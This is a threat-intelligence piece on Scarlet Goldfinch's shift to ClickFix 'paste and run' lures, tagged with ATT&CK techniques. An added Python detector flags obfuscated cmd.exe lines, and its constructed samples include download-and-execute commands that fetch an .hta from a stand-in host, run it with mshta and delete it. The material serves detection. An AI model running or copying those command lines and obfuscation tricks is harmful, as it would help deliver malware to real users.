T1059.001 PowerShell (96%)
“cmd or via PowerShell’s Invoke-CimMethod. Example 1, from early February. Example 2, from mid-March. Once Remcos is running, Scarlet Goldfinch often uses it to download, execute, and establish persistence for NetSupport Manager, as described in Epoch 5 in the Threat Detection R…”
T1204.002 Malicious File (85%)
“…3 that followed SocGholish’s fake update footsteps, Scarlet Goldfinch is tracked by other researchers under several different names, including SmartApeSG (due to early observations of C2 infrastructure hosted on SmartApe ASN) and ZPHP (due to the use of PHP files to host c…”
T1204.002 Malicious File (60%)
“Scarlet Goldfinch’s year in ClickFix. Red Canary has just released the 2026 Threat Detection Report, unveiling the top 10 most prevalent threats we detected over last year. Six out of those 10 threats were directly linked to the hottest trend in initial access, “paste and run,” …”
T1219 Remote Access Tools (57%)
“cmd or via PowerShell’s Invoke-CimMethod. Example 1, from early February. Example 2, from mid-March. Once Remcos is running, Scarlet Goldfinch often uses it to download, execute, and establish persistence for NetSupport Manager, as described in Epoch 5 in the Threat Detection R…”
T1027.010 Command Obfuscation (42%)
“these variables were just used to specify the location for the download (and enable a quick deletion of the HTA payload after execution). curl detection from mid-February. Additional obfuscation appeared in short order, first by adding more command obfuscation via ^ as an esca…”
T1202 Indirect Command Execution (35%)
“payload. The following images show command lines from before and after the forfiles change. forfiles detection from mid-January. if exist detection from late January. Scarlet Goldfinch continued checking for the existence of Notepad until mid-February, and then dropped that rus…”
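The tradecraft quoted in the excerpts above (caret-escape obfuscation, forfiles as a proxy launcher and notepad.exe existence probe, the `if exist` check, and curl fetching an .hta that is deleted once it has run) turned into a small triage script. This is an added example, not Red Canary's detection logic and not code from the report: it strips cmd.exe caret escapes, then matches the de-obfuscated command line against one rule per behaviour and requires two hits before calling a line suspicious. The sample command lines are constructed for illustration; the example.invalid hosts, the use of mshta as the HTA launcher, the rule names, the caret count and the two-hit threshold are all assumptions.

```python
"""Heuristic triage of Windows command lines for the behaviours quoted above.

Added illustration only: rule names, thresholds and the sample command lines
are assumptions, not Red Canary's detections or observed Scarlet Goldfinch data.
"""
import re

# Rules run against the de-obfuscated (caret-stripped) command line.
RULES = [
    # forfiles used to launch something through its /c switch (T1202).
    ("forfiles_proxy_exec", re.compile(r"\bforfiles(?:\.exe)?\b.*?\s/c\s", re.I)),
    # Probing for notepad.exe, either with 'if exist' or via a forfiles /m mask.
    ("notepad_probe", re.compile(
        r"\bif\s+exist\s+\S*notepad\.exe\b|\bforfiles\b.*?\s/m\s+notepad\.exe\b", re.I)),
    # curl pulling down an .hta payload.
    ("curl_hta_download", re.compile(r"\bcurl(?:\.exe)?\b.*?\.hta\b", re.I)),
    # The .hta being deleted in the same command line it was fetched or run in.
    ("hta_self_delete", re.compile(r"\.hta\b.*?\b(?:del|erase)\s", re.I)),
]
CARET_THRESHOLD = 3  # assumption: three or more carets in one line is rarely benign


def strip_caret_escapes(cmd: str) -> str:
    """Undo cmd.exe caret escaping outside double quotes.

    cmd.exe treats '^' as an escape character: '^x' becomes 'x' and '^^'
    becomes '^'. Inside double quotes the caret is literal, so quoted spans
    are copied through unchanged.
    """
    out = []
    in_quotes = False
    i = 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes and i + 1 < len(cmd):
            out.append(cmd[i + 1])  # keep the escaped character, drop the caret
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def analyze(cmdline: str) -> dict:
    """Return the normalized line, the rule names that fired, and a verdict."""
    norm = strip_caret_escapes(cmdline)
    hits = [name for name, rx in RULES if rx.search(norm)]
    # Caret density is measured on the raw line, before de-obfuscation.
    if cmdline.count("^") >= CARET_THRESHOLD:
        hits.insert(0, "caret_obfuscation")
    # A single hit (forfiles alone, one curl) is noisy; require two behaviours.
    return {"normalized": norm, "hits": hits, "suspicious": len(hits) >= 2}


# Constructed sample command lines (not observed data).
SAMPLES = {
    "constructed_if_exist_curl": r'cmd.exe /c if exist "C:\Windows\System32\notepad.exe" (curl.exe -o %TEMP%\upd.hta http://example.invalid/index.php & mshta %TEMP%\upd.hta & del %TEMP%\upd.hta)',
    "constructed_caret_forfiles": r'cmd /c c^u^r^l -o %TEMP%\upd.hta http://example.invalid/u.php & for^files /p C:\Windows\System32 /m notepad.exe /c "cmd /c mshta %TEMP%\upd.hta & del %TEMP%\upd.hta"',
    "benign_log_cleanup": r'forfiles /p C:\Logs /s /m *.log /d -30 /c "cmd /c del @path"',
    "benign_powershell": r'powershell.exe -Command "Get-ChildItem C:\Temp | Measure-Object"',
}

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        result = analyze(line)
        print(f"{label}: suspicious={result['suspicious']} hits={result['hits']}")
```

The benign forfiles sample fires exactly one rule, which is why the verdict needs two: forfiles with `/c` is ordinary administration, and it is the combination with a notepad.exe probe, an .hta fetch, or heavy caret use that makes the line worth a look.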
Summary
How Scarlet Goldfinch ditched its fake updates lure and adopted ClickFix, or "paste and run," in 2025 and beyond.